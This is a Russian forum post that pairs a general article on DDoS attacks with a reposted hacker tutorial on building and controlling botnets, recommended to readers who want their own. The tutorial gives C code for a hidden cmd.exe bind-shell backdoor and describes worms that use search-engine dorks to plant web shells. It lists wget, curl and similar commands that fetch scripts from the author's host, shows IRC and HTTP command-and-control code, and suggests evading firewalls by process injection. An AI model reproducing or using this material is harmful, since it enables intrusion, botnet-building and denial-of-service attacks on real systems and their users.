DDoS-атака - распределенная атака типа отказ в обслуживании (DDoS - Distributed Denial of Service). Сегодня она является одной из самых распространенных и опасных сетевых атак. Ежегодно атаки DDoS стоят различным компаниям и госструктурам миллиарды долларов и таят в себе серьезную угрозу для любой компьютерной системы. По существу, атака DoS нарушает или полностью блокирует обслуживание законных пользователей, сетей, систем и иных ресурсов. Результат таких атак - длительные простои системы, потерянная прибыль, большие объемы работ по идентификации атак и :zns2: подготовка адекватных ответных мер.
По данным Computer Emergency Response Team (CERT) - авторитетной международной организации в области безопасности Интернета, количество DDoS-атак резко возросло именно в последние годы, хотя сама технология известна уже достаточно давно. Новейшие информационные технологии теперь активно используются организованными преступными группировками. Впрочем, мотивация атакующих может быть самой различной: мелкая месть, чрезмерно рьяная конкуренция или вымогательство. Независимо от конкретных причин, цель атакующих - поставить систему-мишень на колени, задействовав множество атак в диапазоне от локального прекращения сервиса до массивного DDoS-"наводнения".
Большинство DDoS-атак базируется на использовании уязвимостей в основном
протоколе Internet (TCP/IP), в частности, на способе обработки системами
запроса SYN. Эта ситуация усугубляется еще и тем, что взломщики, чтобы
сохранить свою анонимность, используют ложные исходные адреса. Таким образом,
значительно затрудняется выявление реальных злоумышленников. Кроме того,
широкое распространение DDoS-атак показало несостоятельность традиционно
применявшихся в глобальной Сети технологий обеспечения безопасности. Многие
эксперты по вопросам безопасности считают, что число таких атак возрастает из-
за быстрого распространения систем Windows NT/XP и роста Интернета.
Операционная система Windows - мишень для абсолютного большинства взломщиков.
Кроме того, многие средства DDoS очень легкодоступны, и для их использования
не требуется высокая квалификация.
Типы атак DDoS
Существует два основных типа атак, вызывающих отказ в обслуживании. Первый тип приводит к остановке всей работы системы или сети. Если взломщик посылает жертве данные или пакеты, которые она не ожидает, и это приводит либо к остановке системы, либо к ее перезагрузке, значит, взломщик проводит атаку DDoS, поскольку никто не сможет получить доступ к ресурсам. С точки зрения взломщика, эти атаки хороши тем, что с помощью нескольких пакетов можно сделать систему неработоспособной. В большинстве случаев для того, чтобы вернуть систему в нормальный режим работы, необходима перезагрузка системы администратором. Таким образом, первый тип атак является наиболее разрушительным, поскольку осуществить атаку легко, а для устранения ее последствий требуется вмешательство оператора.
Второй (более распространенный) тип атак приводит к переполнению системы или локальной сети с помощью такого большого количества информации, которое невозможно обработать. Например, если система может обрабатывать только 10 пакетов в секунду, а взломщик отправляет 20 пакетов в секунду, то когда законные пользователи пытаются подключиться к системе, они получают отказ в обслуживании, поскольку все ресурсы заняты. При такой атаке злоумышленник должен постоянно переполнять систему пакетами. После того как он перестает заполнять систему пакетами, проведение атаки прекращается, и система возобновляет нормальную работу. Этот тип атаки требует больше усилий со стороны взломщика, поскольку ему необходимо постоянно активно воздействовать на систему. Иногда этот тип атаки приводит к остановке системы, однако в большинстве случаев восстановление после проведения этой атаки требует минимального вмешательства человека.
При проведении DDoS-атаки второго типа подвергшаяся нападению машина (чаще всего это сервер) получает пакеты одновременно от большого количества машин, хозяева которых сами могут и не подозревать о происходящем. Кроме того, поскольку эти атаки проводятся с широкого диапазона IP-адресов, становится гораздо сложнее блокировать и обнаруживать нападение по той причине, что небольшое количество пакетов с каждой машины может не вызвать реакции со стороны систем обнаружения вторжений. Если атака проводится с одного IP- адреса, его можно блокировать с помощью брандмауэра. Если же задействовано 1000 машин, то блокировать их становится чрезвычайно трудно.
Причем, как правило, атака против единственной жертвы проводится с множества компьютеров, разбросанных по всему миру. Если даже проводимые с одного источника атаки DDoS бывает сложно предотвращать, то можно себе представить, насколько сложнее защищаться от таких атак, которые проводятся с множества машин, расположенных в разных местах. К тому же от атак DDoS защититься довольно сложно еще и потому, что жертва никогда не может исключить полностью возможность ее проведения. Если компьютерная система подключается к Интернету, то всегда есть вероятность того, что взломщик может отправить в нее такое количество данных, которое она будет не в состоянии обрабатывать.
Вот конкретный пример того, как организовываются DDoS-атаки в наши дни -
посредством комбинирования компьютерных технологий и приемов социальной
инженерии. В Интернете в начале января 2005 года компьютерной компанией Sophos
была зафиксирована рассылка почтового вируса, маскирующегося под просьбу
помочь жертвам цунами в Юго-Восточной Азии. Вирус приходил в виде письма с
заголовком "Tsunami dotation! Please help!" ("Пожертвования на цунами,
пожалуйста, помогите") и приложенным исполняемым файлом "tsunami.exe".
Собственно, этот файл и содержал вирус. При активации он заражал компьютер
пользователя, рассылал свои копии по всем найденным в компьютере адресам и
готовился совершить DDoS-атаку на один из немецких хакерских сайтов.
Защита от DDoS-атак
Естественно, принципиально важный вопрос для специалистов в области компьютерной безопасности - способы защиты от DDoS-атак. Универсального "рецепта" нет до сих пор. Пока основное средство - быстрое обнаружение и способность сосредоточить силы чрезвычайного реагирования интернет-провайдера. Провайдер, получив тревожный сигнал, обязан моментально развернуть входные фильтры, чтобы блокировать "мусорный" трафик в тех точках, где он входит в сеть провайдера. Пока это лучший способ подготовиться к массированной DDoS- атаке и при необходимости быстро ее остановить. Для примера: основной хост- сервер Пентагона подвергается в среднем ста DDoS-атакам в неделю, но благополучно с ними справляется именно благодаря собственной "системе быстрого реагирования".
Следует помнить, что большинство операционных систем (от Windows до многих
версий UNIX), маршрутизаторов и компонентов сетей, которые должны обрабатывать
пакеты на каком-либо уровне, являются уязвимыми для атак DDoS. Хотя атаки DDoS
предотвратить довольно сложно, ограничение доступа к важным учетным записям,
ресурсам и файлам, а также защита их от неправомочных пользователей может
существенно затруднить проведение многих атак DDoS.
"Коммерческий" DDoS
Аналитики уже давно предсказывают, что в будущем DDoS-атаки будут одним из основных видов оружия в кибервойнах. В Интернете уже давно бушуют конфликты - от дилетантских взломов сайтов небольших фирм до хакерского проникновения в сети транснациональных корпораций и крупных госструктур. Но пока DDoS-атаки все же чаще используются организованными преступниками в своих целях.
Спрос порождает предложение. По сообщению ряда СМИ, уже и в Рунете появилась своеобразная "услуга", когда киберпреступники предлагают заблокировать доступ пользователей Интернета к тому или иному сайту за 150 - 250 USD в сутки. Правда, многие эксперты утверждают, что за предложением "убить" веб-страницу по предоплате может скрываться обычное мошенничество.
Типичное рекламное предложение этой "услуги" выглядит примерно так: "Мы рады
вам предоставить качественный сервис по устранению сайтов, мы можем положить
любой сайт нашей атакой, которая называется DDoS-атака". Согласно прайс-листу,
шестичасовой простой веб-сайта обойдется заказчику в 60 USD, а суточный - в
150 USD. По предоплате. Однако, судя по всему, серьезные организаторы DDoS-
атак свою деятельность не афишируют, а заказчиков им поставляют организованные
криминальные структуры.
DDoS-"невидимка"
Специалисты хорошо знают: преступления в сфере компьютерных технологий специфичны прежде всего тем, что имеют высокий уровень латентности. Так, по данным Национального отделения ФБР по компьютерным преступлениям, от 85% до 97% компьютерных посягательств не выявляются либо не предаются огласке. По оценкам других экспертов, латентность компьютерных преступлений в США достигает 80%, в Великобритании - до 85%, в ФРГ - 75%, в России - более 90%.
Причина такой ситуации в том, что многие организации, по тем или иным мотивам,
разрешают конфликт своими силами, не обращаясь к правоохранительным органам.
Чаще всего это боязнь огласки и, как следствие, потери репутации в деловых
кругах. Другой распространенный вариант - опасения топ-менеджеров, что
начавшееся расследование вскроет и их собственные грязные делишки. В
результате пострадавшие от DDoS-атак бизнес-структуры в большинстве случаев
решают эту проблему исключительно организационно-техническими методами. И, как
следствие, способствуют тому, что организаторы DDoS-атак остаются
безнаказанными.
Источник
Очень хорошую статью нарыл в инете. Почитайте.Будет интересно тем,кто решил себе завести ботнет-сеть.
Зомби-Коммандование
/* все о принципах построения, работы ботнетов /
/ и их управлении */
Автор: 1nf3ct0r
Думаю, ты не раз задумывался о такой идеи как поднятие своего собственного ботнета, ну, или быть может, просто интересовался о том, как это устроено.Или в конце концов ты уже добился поставленных выше целей. Как бы это ни было, тебя это заинтересовало и ты не просто так докопался до этой статьи. Чтож, сейчас я постараюсь рассказать все тоноксти построения зомби-сетей.
Приступим.
Возможно, статью читают люди, совершенно не понимающие о чем идет речь. У новичка сразу возникнет ряд вопросов:
- Что такое ботнет? Зачем это нужно? Какая от этого прибыль? Как это примерно работает?
Вопросов будет достаточно много, чтобы разобраться с ними дочитывай статью доконца, а пока разберемся с поставленными.
Итак, ботнет - ничто иное, как сеть из зараженных компьютеров при помощи
трояна или червя, которыми управляют хакеры, или как
часто их еще называют, - ботмастеры. Каждая такая зараженная тачка называется
ботом или зомби.
Все эти машины объединяются в единую сеть - ботнет. Основной целью ботмастеров в перспективе ботнетов является полное управление зараженными компьюетрами, а также для проведения распределенных атак на отказ в обслуживании, рассылки спама, хостинга на ботах для сайтов с запрещенным контентом и т.д.
Насколько тебе должно быть известно, рассыл спама - очень выгодный метод
заработка в сети и тебе, наверное, ни раз приходили письма с предложениями
увеличить какие-то части тела, купить таблетки для похудения и прочее, прочее.
Одним из самых частых целей использования ботнета является заработок на
распределенных атаках на отказ в обслуживании (DDoS, англ. Distributed Denial
of Service) - атака, возникшая от своего младшего брата - DoS (Denial of
Service - отказ в обслуживании), успешным результатом атаки которой является
зависание сервера или отдельного демона.
В качестве метода атаки выступает банальный флудинг определенными пакетами,
зависищими от методов DoS'a, которых существует
достаточно большое множество. Если подумать логически над выражением
"распределенная атака в обслуживании", то можно сразу
(ну или не сразу) понять, что DDoS - усовершеннствованная как в качестве
эффективности, так и в масштабности, атака.
Объясню подробнее. Главным отличием DoS'a от DDoS'a является то, что в первом
случае флудинг идет лишь с одной машины, как
правило это какой-нибудь шелл или выделенныый сервер (DS/VDS) с широченным
интернет-каналом, зафлудить с которого, например,
простого диалапщика - раз плюнуть, а во-втором случае - флудинг идет сразу со
всей зомби-сети! Причем количество ботов
зависит от стараний и мастерства хакера - их может быть сотни, тысячи или даже
миллионы! Довольно непросто представить себе
как будет вести себя атакованная машина ICMP-пакетами с двух/трех тысяч ботов,
но ясно одно: компьютер уйдет в нокдаун.
Почему так происходит? Принцип таких атак достаточно прост: сервер получает
пакет, система его обрабатывает, затем,
приходит следующий - и становится "в очередь", итак очень долго - занимаются
ресурсы системы, а севрак попросту
"перегружается", оставляя желать лучшего: либо просто зависания, либо
отключения от сети.
Далее мы рассмотрим с тобой
некоторые методы флуда для того, чтобы ты выбрал тот, что тебе нужен. Также
существует такая интересная идея, как хостинг
на ботах. Зачем это нужно? Допустим ты, не имея ботнета решил, что тебе нуженн
хост под фишинг/спам/дроп-проекты и прочее,
но этого мало. Нужна стойкая, "антиабузная" система, ведь после своих, мягко
говоря, нехороших действия от пользователей
полетят жалобы к хостеру, которые как раз принято называть абузами, а
хостинги, которые забивают на такие абузы -
"абузоустойчивые" хостинги. Как правило, при таком ботнет-хостинге, боты со
скудным каналом отсейваются и остаются лишь
"качественные".
Безусловно, ботов можно использовать, например, для каких-нибудь
распределительных вычислений - здесь список
будет тянуться долго: от каких-либо сложных математических вычислений до
взлома зашифрованных паролей алгоритмом MD5
(кстати, правильнее говорить хэшированных в случае с MD5) или подбора пароля к
RAR-архиву.
Распределенную сеть можно
использовать в той же науке, практически повсеместно, главное - это продумать
и создать такую сеть.
На самом деле, существует не так уж и много методов управления. Я имею ввиду
методов, а не реализаций. Давай разберемся, что
к чему. Наверное, следует начать с самого простого метода управления и, как
принято думать, неудобного. Но я постараюсь
опровергунть данное мнение. Речь идет о архитектуре "Клиент <-> Сервер".
+-------------------------+
| Клиент <-> Сервер |
+-------------------------+
Любой программист, пишущий программы для работы с сетью знает ее "на зубок", не говоря уже о вирусмэйкерах. Если тебе хоть раз приходилось писать систему удаленного администратирования (с англ. Remote Administrative System или сокр. RAT) или попросту говоря, троян, то ты уже знаком с ней.
Такая система довольно-таки проста. Есть две программы, одна называется клиентом, другая - сервером, первая устанавливается на компьютер A, а вторая на B. Как правило, сервер держит открытый порт который слушается сервером. С помощью клиентской части мы подключаемся к серверной и пользуемся ее возможнстями.
Ну, вот тебе
пример: существует FTP-сервер ftp.botneta.net. С помощью чего ты к нему
подключишься? Да, вот именно - с помощью программы,
которую принято называть клиентом. Твой браузер также является клиентом
(HTTP), так как взаимодействует с HTTP-сервером и
т.д. Так вот, почему бы не написать программу, которая бы заставила слушать на
заданном порту командный интерпретатор windows
(обычно - cmd.exe)?
Достаточно прителнетиться к серверной части и у тебя имеется полный доступ к компьютеру. Такие трояны принято называть бэкдорами (backdoors - с англ. потайная дверь). Казалось бы, очень громоздкая и неудобная система для управления ботнетом: придется коннектиться к каждой машине отдельно, назначать ей задание и при том, что IP-адрес машины может постоянно меняться! Также надо будет знать каждую зараженную машину, что называется "в лицо".
Да, полностью согласен, неудобно. В качестве клиента для обычного bind-шелл бэкдора может выступать простой telnet, или даже php-скрипт. Написание последнего - сущий пустяк, зато очень удобно и анонимно! Для начала сделаем форму нашего скрипта: там мы будем вводить команды и при необходимости менять IP-адресс или порт для подключения к бэкдору.
А теперь примимся за работу с сокетами в PHP.
За открытие сокета в php отвечает функция fsockopen(), а за передачу и
получение – функции fputs() и fgets(). На сколько
тебе ясно, данные из формы будут передавать скрипту POST-запросом. Для
закрытия сокета юзаем функцию fclose(), все достаточно
просто:
Основы работы с сокетами на PHP - больше ничего. На самом-то деле не одними
сокетами ограничивается посылка данных на сервер,
помимо сокетов существует еще такая прекрасная вещь как wininet, но PHP-
скриптов это, на сколько я знаю, не касается.
Bind-шелл бэкдор тоже написать очень просто! Для этого также нужно уметь
работать с WinSock2 API. В наши задачи входит написание бэкдора, который
запустит cmd.exe с перенаправлением ввода/вывода
на сокет клиента. Для этого сначало надо инициализируем WinSock2:
BOOL WINAPI StartWinsock(){
WSADATA wsaData; // инфа о библиотеки будет храниться тут
WSAStartup(MAKEWORD(2,2), &wsaData); // инициализируем винсок
return 0;
Для того, чтобы прекратить работу с WinSockets достаточно добавить функцию WSACleanup. То есть WSAStartup – начинает, WSACleanup – заканчивает. Затем нам понадобится создать сам сокет. Делается это также предельно просто (SOCKET s) :
s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
А затем заполняем все необходимые данные о сокете:
localaddr.sin_addr.s_addr = htonl(INADDR_ANY); // ожидаем соединение на любом
сетевом интерфейсе
localaddr.sin_family = AF_INET; // интернет протокол
localaddr.sin_port = htons(31337); // выставили порт 31337
Следующий шаг - связать сетевой адрес с сокетом (bind) и поставить на
прослушку порт (listen), не забудь в самом начале
функции вписать struct sockaddr_in localaddr, clientaddr;:
bind(s, (struct sockaddr *)&localaddr, sizeof(localaddr));
listen(s, 0);
Ну и наконец listen. s – хэнд сокета, 0 – бэклог. Бэклог – это параметр,
указывающий на размер очереди ожидающих подключений
клиентов. Например, если ты выставил в качестве параметра 10, то при
подкдючении 10 клиентов в один момент сервер поставит
их в очередь, а одиннадцатый получит ошибку WSAECONNREFUSED. Если ты выставишь
значение бэклога на SOMAXCONN, то "включится"
поддержка максимальной очереди ожидания.
Чтобы првязать к нему cmd.exe достаточно воспользоваться функцией
CreateProcess() c хэндлами сокета, но может возникнуть проблема с вводом и
выводом. На сколько ты, наверное, знаешь, существуют 3 хэндла ввода-вывода:
STDIN – стандартный ввод.
STDOUT – стандартный вывод.
STDERR – вывод сообщений об ошибках.
Начнем.
Сейчас мы создадим пайпы, предварительно заполнив его сруктуру (Security
Attributes):
для начала добавь следующую лабуду:
(PIPE InPut, OutPut;
typedef struct {HANDLE hRead; HANDLE hWrite;}
PIPE
SECURITY_ATTRIBUTES Sa;
А теперь заполняем Security Attributes:
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.bInheritHandle = TRUE;
sa.lpSecurityDescriptor = NULL;
// создаем...
CreatePipe(&input.hRead, &input.hWrite, &sa, 0);
CreatePipe(&output.hRead, &output.hWrite, &sa, 0);
Теперь заполним структуру ST для нашей функции CreateProcess(), которая
запустит cmd.exe и бэкдор готов.
Опять так, сначало объяви, что st - это стартапинфо: STARTUPINFO si;
ZeroMemory(&si, sizeof(STARTUPINFO));
st.cb = sizeof(STARTUPINFO);
st.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
st.wShowWindow = SW_SPOILER; // параметр SW_SPOILER сделает окно с cmd.exe
невидимым (видимое - SW_SHOW)
st.hStdInput = input.hRead; // STDIN
st.hStdOutput = output.hWrite; // STDOUT
st.hStdError = output.hWrite; // перенаправляем вывод ошибок
// Объявим PROCESS_INFORMATION pr;
CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &ST, PR); //
запускаем CMD.exe с перенаправлением
//ввода/вывода.
}
Не забудь создать бесконечный цикл, не то будет облом, короче, ты
вкурил
Блуждает мнение, что поднять свою зомби-сеть под *nix-like системами, как
правило на взломанных серверах, хотя бы с минимальными привилегями (nobody,
apache, www и т.д) нереально! Это мнение - полнейший абсурд. Вполне реально
построить
ботнет на шеллах. Для начала тебе нужен скрипт, с помощью которого ты бы смог
управлять шеллами.
Для тех, кто в
танке - шелл - это доступ к командному интерпретатору с какими либо
привилегиями, как правило, на unix-тачке. Причем тебе не надо забэкдоривать
каждую систему - достаточно залить вэб шелл, через который ты бы смог
выполнять команды.
Итак, ты достал себе туеву хучу шеллов. Теперь тебе нужен скрипт, который
разошлет всем шеллам
команду, благодаря которой будет будет производиться HTTP-флуд при помощи GET-
запросов заданное количество времени и другими
параметрами (кстати, технологию HTTP-флуда можно с довольно-таки неплохим
результатом применять для накрутки-траффика).
И не надо никаких троянов
.
Этот метод я сам использовал на практике - работает отлично, очень быстро и
просто. Поэтому
как все это замутить - подумай сам, а я пока хочу поюзать данную фишку
.
Даже сам PHP-шелл писать самому не обязательно.
Достать сами шеллы очень просто. Есть несколько вариантов: первый заключается
в
покупке шеллов "оптом" - в огромном количестве. Но продавцы очень часто
бывают нечестными - продают один и тот же шелл по
несколько раз, то есть твои шеллы будут постоянно
удалять. Тебе это надо? Вот и я думаю, что нет. Есть один выход: добывать
шеллы самому. Согласен, что вручную добывать каждый
- ужасный гемор, но кто сказал, что это делается вручную? Итак, первое, что
тебе понадобится - это знание каких-либо языков
программирования.
Я предлогаю для нашей задачи один из следующих языков: PHP, Perl и C. А также
умение использовать
уязвимости в вэб-скриптах, обычно это PHP. Суть
такова: пишется скрипт-червь на (допустим) perl, который с помощью поисковой
системы Google будет искать уязвимый скрипт,
с помощью которого есть вомозжность выполнять команды на сервере - нам
подойдут уязвимости класса PHP-include() и
PHP-injection. С помощью специально составленного google-запроса твой червь
отыскивает уязвимые скрипты и заливает шеллы,
затем, после каждого удачно залитого шелла он записывает урл шелла в лог-файл.
Звучит заманчиво, правда? Но и тут возникают
некоторые проблемы. Во-первых, это знание языка, во-вторых - знание команд
unix, в третьих - те самые необходимые навыки
взлома, ну и в четвертых - умение работать с google - правильно составлять
запросы
.
То есть "начинающим хакерам" еще
придется нихило попотеть, чтобы создать такую сеть.
Также нужен бажный скрипт, который бы
широко использовался в качестве вэб-движка. Если ты найдешь движок с php-
инклуд багом, который установлен примерно на 100
серверах, то ты счастличик.
За пару часов червь справится с работой и вернет тебе все шеллы.
Именно по такому принципу работали google-черви вроде Santy и его модификации,
которые были написаны на perl'e (кстати,
исходники Santy.A, Santy.B, Santy.C, скрипт для управления вэб-шеллами и много
других полезных вещей ты найдешь в архиве со
статьей), в качестве уязвимости использовал php-injection баг в форумном
движке phpBB 2.0.10. Так как форум был (и есть) очень популярным, то червяк
произвел очень много успешных взломов. Единственное, что обидно - он просто
дефейсил сайты... Бесполезно, правда? Так вот, хватит теории, давай углубимся
в суть
проблемы и решим ее вместе (вступай и компилируй
).
Итак, для начала нам надо составить с тобой запрос, который мы скормим
поисковой системе. Вообще, кто не в курсе - существует метод взлома (или
культ, не знаю как сказать), который так и
называется - Google-Hacking.
Суть заключается в том, что с помощью граммотно составленного google-запроса
можно найти
уязвимые скрипты, дампы баз данных с кредитками, пароли от ICQ-номеров и т.д.
На данную тему написано огромное количество
статей и мануалов, но самым центральным ресурсом является
http://johny.ihackstuff.com/, содержащий в себе туеву хучу
готовых запросов. При наличии n'ого количества денег ты можешь даже прикупить
там целую книгу с эксклюзивными запросами. И
все же я поведаю тебе немного о синтаксисе google.
Допустим, тебе понадобилось найти скрипт под названием botnet.php. Так как
подобных скриптов очень много, то желательно
сделать более подробный запрос. Например, заголовок (который находится в тегах
Что же мы сделали? Итак, команда wget - это команда скачки какого-либо файла
из сети на шелл. Чаще всего используется она,
но все же ее может и не быть. Поэтому дам тебе совет: попробуй заставить все
известные качалки (wget, fetch, get, lynx,
curl, links) скачивать файл из сети. Вот синтаксис этих штук:
Wget: wget -O /tmp/script.pl http://1nf3ct0r.nm.ru/hack/script.pl
Curl: curl --output /tmp/script.pl http://1nf3ct0r.nm.ru/hack/script.pl
Fetch: fetch -o /tmp/script.pl http://1nf3ct0r.nm.ru/hack/script.pl
GET: GET http://1nf3ct0r.nm.ru/hack/script.pl > /tmp/script.pl
Links: links -source "http://1nf3ct0r.nm.ru/hack/script.pl" > /tmp/script.pl
Lynx: lynx -source "http://1nf3ct0r.nm.ru/hack/script.pl" > /tmp/script.pl
Сначало мы закачали вэб-шелл с http://1nf3ct0r.nm.ru/hack/shell.php и
назвали
его smile.php. Затем слили perl-скрипт, который сообщит в лог файл POST-
запросом где находится скрипт (пиши сам), запустим
его и удаляем этот скрипт.
Если тебя заинтересовала данная тема, то советую почитать статью n4n0bit'a с
нашего сайта
hellknights.void.ru - она называется "Боты поисковых машин". Вчитывайся, там
раскрыты все основные проблемы.
Но не одними шеллами ограничивается *nix-ботнет. Существуют и черви и вирусы
под *NIX! О них я как-то писал в своей статье
"Вирусы, изменившие мир", которую ты также можешь найти на
http://hellknights.void.ru/.
Например, червь Li0n атаковал BIND версий 8.2 - 8.2.3, которые содержали в
себе уязвимость TSIG-запросов, после проникновения на машину он устанавливал
t0rn-руткит -
простейший руткит, протроянивающий системные приложения вроде ps, ls, netstat
и т.д. Shadow-пароли (/etc/shadow/) и файл
с логинами (/etc/passwd) он слал на мыло автору. А червь Slapper (Modap/Cinik)
атаковал модуль OpenSSL 0.9.6d вэб сервера
Apache, получая при это привилегии привелегии, из под которого и был запущен
апач (nobody, www, apache и т.д).
Использовался он как раз-таки как DDoS-бот. Или есть еще один вариант: твой
червь будет устанавливать на взломанные тачки свой DoS-софт, через который и
будет проводиться атака.
Также существует такая прекрасная штука, как ICQ. Я думаю говорить что это
такое - нет смысла. Это есть то, что мешает
работать, учиться и вообще, предмет, на который можно свалить все свои
неудачи.
Так вот, именно проткол ICQ (TOC, с января
2006'ого это уже вторая версия проткола, непонятно зачем переделанная) можно
использовать для управления бэкдорами. Самое
примечательное - это анонимность. А ведь можно сделать целую распределенную
сеть ботов с управлением через ICQ.
Несмотря на то, что данная система кажется сложной - все достаточно просто!
Все также основано на работе с сокетами. Получем
команду и выполняем ее через ShellExecute(). Если юзер что-то заподозрит, то
обломается: сетевая активность происходит через
ICQ-сервер. Но об этом как нибудь в другой раз. Все, хватит. Дадим оценим
методик с шеллами:
Плюсы [ + ], Минусы [ - ], Спорно/Нейтрал [~]:
[~] Система управления ботнетом выполнена на твердую "4", несмотря на то, что
на PHP можно сделать
сборку по странам, чекер шеллов и многое другое. Ведь запускается цикл по
"раздаче" команд
ботам - это, безусловно, займет n'ое количество времени. Чтобы шеллы
добавлялись автоматически
можно написать скрипт, который бы находил URL до шелла и отправлял его POST-
методом на скрипт
управления ботами, добавив в БД, а затем уничтожив себя.
[ + ] Нету убогих диалаповых машин, все серваки с широким каналом.
Постоянный онлайн ботнет.
[~] Шелл очень просто найти и удалить
Но зато нету проблем с антивирусным ПО.
[ + ] Переносимость ботнета.
Скопировал адреса шеллов, свалил на другой сервак.
[~] Нужна определенная квалификация для написания скриптов, зависящая от их
функционала.
Так, что нубам можно забыть об этом и купить соответствующие книжки
[~] Проследить откуда поступала комманда - достаточно просто: логи апача еще
никто не отменял.
Но ведь можно и логклинер встроенный в nix-бота поставить или еще чего
такого.
Все же это не так палевно, как с централизованными сетями, о работе которых я
тебе сейчас расскажу
+-------------------------+
| Централизованные сети |
+-------------------------+
Как это? Ну во-первых скажу, что по такому принципу работают практически все
DDoS-боты. После запуска трояна на компьтере,
он сам коннектится к ботнет-серверу. Все прелести налицо. Но также много
неприятных моментов. При исследовании бота очень
просто просечь сервер, куда он коннектится. Полетят абузы, грохнут сервер
(или, быть может, сам рухнет?) - ботнет не вернуть.
Существует как минимум два метода управления такой DDoS-армией: первая - это,
безусловно, IRC - одна из самых старых
технология управления ботами, постепенно теряющая свою актуальность. И вторая
Советую почитать статью "IRC-плацдарм для ботов" из журнала "хакер #78", ссылку на нее ты найдешь в конце статьи. Прежде чем ты примишься за ниписание IRC-бота тебе надо разобраться с IRC-протоколом, чем я тебе и помогу. Также советую почитать RFC 1459. Начнем. Телнетимся к серверу:
#telnet irc.botneta.net XxxX
XxxX - это порт. Причем порт может быть разным, например если кодировка нужна
KOI8-U, то мы коннектимся на 6667 порт.
Вот все порты:
6667: KOI8-U 7770: KOI8-R 7774: Macintosh 6668: Translit 7771: utf8 7775:
Translit
6669: utf8 7772: CP866 7776: KOI8-U 7773: ISO-8859_5 7777: Alt.Translit
Если коннект прошел успешно, а-ля появились строки вроде:
:Infinity.botneta.net NOTICE AUTH :*** Looking up your hostname...
:Infinity.botneta.net NOTICE AUTH :*** Found your hostname
nick твой_ник
Затем:
user имя_юзверя хостнейм irc.botneta.net :твой_ник твой_второй_ник.
Все, мы авторизировались. Чтобы войти на канал набирай:
join #канал
Чтобы отправить сообщение набирай:
privmsg #канал :сообщение w00t ppl!! =)
Есть еще такая важная штука как PING-PONG. Нет, это далеко не игра. Сервер
может в любое время послать сообщение PING,
на которое клиент должен быстро ответить PONG, иначе конннект оборвется. Зачем
это надо? Для того, чтобы проверить,
является ли клиент соедиененным с IRC-сервером или нет. Вот этого всего хватит
для того, чтобы начать писать бота.Поверь, написать это все очень просто.
Если какие проблемы - то посмотри исходники разных ботов и заюзай google, а
потом пиши
мне
А теперь перейдем к управлению через HTTP. Тебе не придется разбираться с
протоколом, так как у нас уже есть наборы
функций для работы с ним. Мне известны по крайней мере два: Internet API и
UrlMon API.
Кроме того, помимо работы с HTTP
они поддерживают работу с FTP-протоклолом. Приступим. Итак, какие есть методы
получения команд ботами? Соглашусь, не так уж и много, но нам этого хватит
сполна. Первый способ заключается в том, что боты будут читать команды из
.txt-файла. Причем команды можно шифровать каким-нибудь алгоритмом, а ключ
шифрования скормить трояну (с соответствующей функцией дешифровки). То есть,
все трояны будут бесконечно скачивать файл из сети и пропарсив его содержимое,
выполнять соответствующие команды. Кажется геморно, но на самом деле все круто
.
Команды можно добавлять через PHP-скрипт и держать их там определенное время.
Все это с таким же успехом реализуется на C++, работая с сокетами.
Сначало шлем GET-запрос на файл с командами, затем создаем сокет и коннетимся.
#define HELL "hellknights.void.ru"
char *sendb = "GET /botnet/cmds.txt HTTP/1.0\r\nHost: "HELL"" \r\n\r\n", //
формируем GET-запрос
recvb[2048];
SOCKET socket = socket(AF_INET,SOCK_STREAM,0); // создаем сокет
memset(recvb,0,2048);
// заполняем структуру
SOCKADDR_IN host;
host.sin_addr.S_un.S_addr = resolve(HOST); // резолвим
host.sin_family = AF_INET; // уже
писал
host.sin_port = htons(80); // 80 порт
if(connect(socket, (struct sockaddr *)&host,sizeof(SOCKADDR_IN))) //
коннетимся
return -1;
send(socket, sendb, strlen(sendb),0); // шлем пакет
Получаем пакет:
Sleep(5000); // здесь желательно поставить sleep, чтобы дождаться ответ от
сервера
int i;
while(i = recv(socket,recvb+strlen(recvb),1,0))
{if (i == SOCKET_ERROR) return -1;}
А вот и функция резолва:
DWORD resolve(char host)
{
DWORD ret = 0;
struct hostent * hp = gethostbyname(host);
if (!hp) ret = inet_addr(host);
if ((!hp)&&(ret == INADDR_NONE)) return 0;
if (hp != NULL) memcpy((void)&ret, hp->h_addr,hp->h_length);
return ret;
}
После нам придется пропарсить .txt на наличие команд. Я думаю, ты справишься с
этим, ничего сложного
нет. Есть еще один вариант: не юзать GET, а вопспользоваться функцией WinAPI -
InternetOpenUrl() для получения команд ботами.
Но есть одно но! А ты не подумал, что боты сами могут тебя
задосить!?
Вот-вот! Придется брать себе абузоустойчивый дедик,
с широким каналом, который стоит не так мало (50$-200$ в месяц и более).
Есть другой метод: пишется скрипт, который бы отображал ботов в своей таблице.
То есть боты сначало бы коннетились к скрипту и добавляли себя в список: IP-
адрес, UID, версия ОС, имя компьютера, страна, скорость соединения и
количество времени в онлайне. Затем, полсе того как бот коннетится к скрипту и
прочее, мы выполняем команду и запускается цикл по раздаче команды всем ботам
по той самой таблице.
Более медленный, но за то более экономный и беспалевный метод. Все написание
также основывается на всем том, что мы с тобой рассматривали выше.
Передать данные скрипту можно также при помощи Internet Explorer, а также
функций WinExec() и CreateProcess(). (кстати, что касается WinExec - это
устаревший вариант, использующийся еще аж в Win16-системах, в win32 же
корректнеее будет использовать
CreateProcess(), но WinExec по прежнему работает отлично).
Заполним все структуры которые нам нужны, как это мы делали с тобой чуток
ранее. И вызываем CreateProcess():
CreateProcess("EXPLORER.EXE","http://hellknights.void.ru/botnet/?msg=w00t!0wn3d",0,0,false,CREATE_NEW_CONSOLE,0,0,&si,&pi);
&si - это указатель на StartUpInfo, а &pi - указатель на ProcessInformation.
Этот метод также примечателен тем, что у нас
возникает минимум проблем с файрволом, что не может не радовать
.
Этого, конечно, не достаточно для полного его обхода,
можно намутить хитрый Process Injection в доверенный процесс. Вообще есть
куча методов для обхода файров, особенно в ring0.
В качестве доверенного приложения можно выбрать браузеры или svchost.exe,
который записан во всех файрволах как доверенное приложение и которому
разрешено лезть на 80 порт.
Если ты его заблокируешь в файрволе, то не сможешь лезть на 80 порт
.
Но мы не об этом. Также не забудь в структуре STARTUPINFO указать невидимость
окна:
si.wShowWindow = SW_SPOILER;
Здесь у нас существует такая проблема, как путь до папки C://Program
Files/Internet Explorer/. Решить эту проблему нам
поможет константа %Programfiles%. Но это тоже не самый лучший вариант, так,
